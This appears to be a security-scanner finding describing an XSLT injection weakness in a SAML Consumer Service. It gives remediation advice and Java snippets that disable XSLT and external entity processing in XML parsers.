SAML Consumer Service XSLT injection
Description
The application's SAML Consumer Service is vulnerable to XSLT (Extensible Stylesheet Language Transformations) injection. This occurs when the XML parser processes untrusted SAML responses containing malicious XSLT stylesheets without proper validation. An unauthenticated attacker can exploit this vulnerability by crafting a malicious SAML response that executes arbitrary XSLT transformations on the server, potentially leading to unauthorized file access or server-side request forgery (SSRF) attacks.
Remediation
Implement the following security measures to prevent XSLT injection attacks:
1. Disable XSLT Processing (Recommended):
If XSLT transformations are not required for SAML processing, completely disable XSLT execution in your XML parser configuration. For example, in Java:
// Disable XSLT processing TransformerFactory factory = TransformerFactory.newInstance(); factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
2. Restrict External Resource Access:
Configure the XML parser to prevent access to external entities and stylesheets:
// For SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
3. Validate SAML Responses:
Implement strict validation of SAML responses to reject any containing XSLT processing instructions or stylesheet references before parsing.
4. Use Secure SAML Libraries:
Utilize well-maintained SAML libraries that have built-in protections against injection attacks and keep them updated to the latest versions.